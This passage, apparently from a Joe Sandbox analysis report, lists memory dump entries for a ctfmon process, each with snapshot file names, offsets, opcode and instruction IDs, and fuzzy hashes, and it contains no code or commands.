                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: I
                                                                                                                  • API String ID: 0-3707901625
                                                                                                                  • Opcode ID: 5d20202096d7ab81db41d2fc1751f0ae7a7a000a443881c99d743556cade1d86
                                                                                                                  • Instruction ID: 352cb8626d08434f0fce90f601030a3564e3fe0e1065f4a3c9644e5d9d196d50
                                                                                                                  • Opcode Fuzzy Hash: 5d20202096d7ab81db41d2fc1751f0ae7a7a000a443881c99d743556cade1d86
                                                                                                                  • Instruction Fuzzy Hash: 3DE01A7154E7C04FCB46EB3488698447FA0EE6721078B40EEC185CF1B3E62D9849C701
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348b0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b8117e2188a0b56141778081712adbe53c36fc5b39b677d9a053a2a12162f0e6
                                                                                                                  • Instruction ID: 3628555ac0527125ad3a5af77f0d1edf5d8ed4700d4e54cd808a26a0db175cfc
                                                                                                                  • Opcode Fuzzy Hash: b8117e2188a0b56141778081712adbe53c36fc5b39b677d9a053a2a12162f0e6
                                                                                                                  • Instruction Fuzzy Hash: 89F0E530B0C54A4FE609DF0C98E15B933A1EF46710F004175E95AC32D7DE7CA806E6C0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348b0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                  • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                                                                  • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                  • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 255e7228b3b5060bb0a1330e8f42c1cb0e77bcb87b0113081d35ece2dd2c332f
                                                                                                                  • Instruction ID: cad59880ea2838d87f4fd587b782959201c0110e635fecbd24ba9d03d9e2b10e
                                                                                                                  • Opcode Fuzzy Hash: 255e7228b3b5060bb0a1330e8f42c1cb0e77bcb87b0113081d35ece2dd2c332f
                                                                                                                  • Instruction Fuzzy Hash: A3E01230B094164BF7959B54C4A07B962A1EB8A340F141078DB5DD33D5CF7CAD009755
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                  • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                  • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                  • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 996b319ab35f1e6834f933f29f5f054e5ea3d76bb15de337fc4911b0dc83ebd8
                                                                                                                  • Instruction ID: 3276c49e548a53cd1e4f0de83272f49a2a4426b800ddd0947254fd997842c080
                                                                                                                  • Opcode Fuzzy Hash: 996b319ab35f1e6834f933f29f5f054e5ea3d76bb15de337fc4911b0dc83ebd8
                                                                                                                  • Instruction Fuzzy Hash: 60C012306118088FCA88EB28C894E1473A0FB1A304B950094E00DCB2A1D66AECC2DB81
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dacd7fa29f37f9d560091b688c84ea9254209ac305b5f2fd2b93a15646a02054
                                                                                                                  • Instruction ID: 669f3a9db257c8a8ed837e302ad47010a3f241670bae4078e87893dc875bb850
                                                                                                                  • Opcode Fuzzy Hash: dacd7fa29f37f9d560091b688c84ea9254209ac305b5f2fd2b93a15646a02054
                                                                                                                  • Instruction Fuzzy Hash: 23C01230A2980E8FDA80BB28C888924BBA0FF0E301BE908E0E00CC71A1D65998908B01
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 179b25b144e2f29aaa3cc3ac54554b8895f9ce9577e118b6f1014ed865f85bc8
                                                                                                                  • Instruction ID: 2499b4f497855eefc6a1a00a3e0b237b2b6b9dd9fe9607a65606e68cca8249bd
                                                                                                                  • Opcode Fuzzy Hash: 179b25b144e2f29aaa3cc3ac54554b8895f9ce9577e118b6f1014ed865f85bc8
                                                                                                                  • Instruction Fuzzy Hash: CEC04C05F5B65B01A9D53B6E58E60ADA1405BC7728FDD1572D74CD0091ACCD20D92277
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0ccc397f1cb7a983c9bfd665e39f639b7cbee496624023b53248f11b89ebbceb
                                                                                                                  • Instruction ID: a92e4db9ab2936683f9e9d1936f12e742ffb2f76d95e84dd0f249778593a6397
                                                                                                                  • Opcode Fuzzy Hash: 0ccc397f1cb7a983c9bfd665e39f639b7cbee496624023b53248f11b89ebbceb
                                                                                                                  • Instruction Fuzzy Hash: AEC08C01F1882A02E369274400311FE08524F51300F541430E00DC33CACF2C2E0102C2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 27d5eb2966f874ee4979399960ad64d3c4552ba2cf287f4473199d5ec82c46ae
                                                                                                                  • Instruction ID: 5c9538717dfbb204b014aa22264d4be7daafa63e35016c887e7dd86aa84dcd2d
                                                                                                                  • Opcode Fuzzy Hash: 27d5eb2966f874ee4979399960ad64d3c4552ba2cf287f4473199d5ec82c46ae
                                                                                                                  • Instruction Fuzzy Hash: 04B01200E6740F00A48437BE08D206470405B47200FC91070D70CC0081A8CD20982363
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bcda58ead01f925a8211499ddb2dcfb170daf11e74f7dfb1c5ef012c79b8a96c
                                                                                                                  • Instruction ID: 9f7ed78d4ab93ff93b1e56f4d5d14cab7e19abe966447f83afdbe8aa09ba3898
                                                                                                                  • Opcode Fuzzy Hash: bcda58ead01f925a8211499ddb2dcfb170daf11e74f7dfb1c5ef012c79b8a96c
                                                                                                                  • Instruction Fuzzy Hash: E6C02B10E0901600E3A4473044601FDB1404F03300F06C071402ED6480DE2C17043340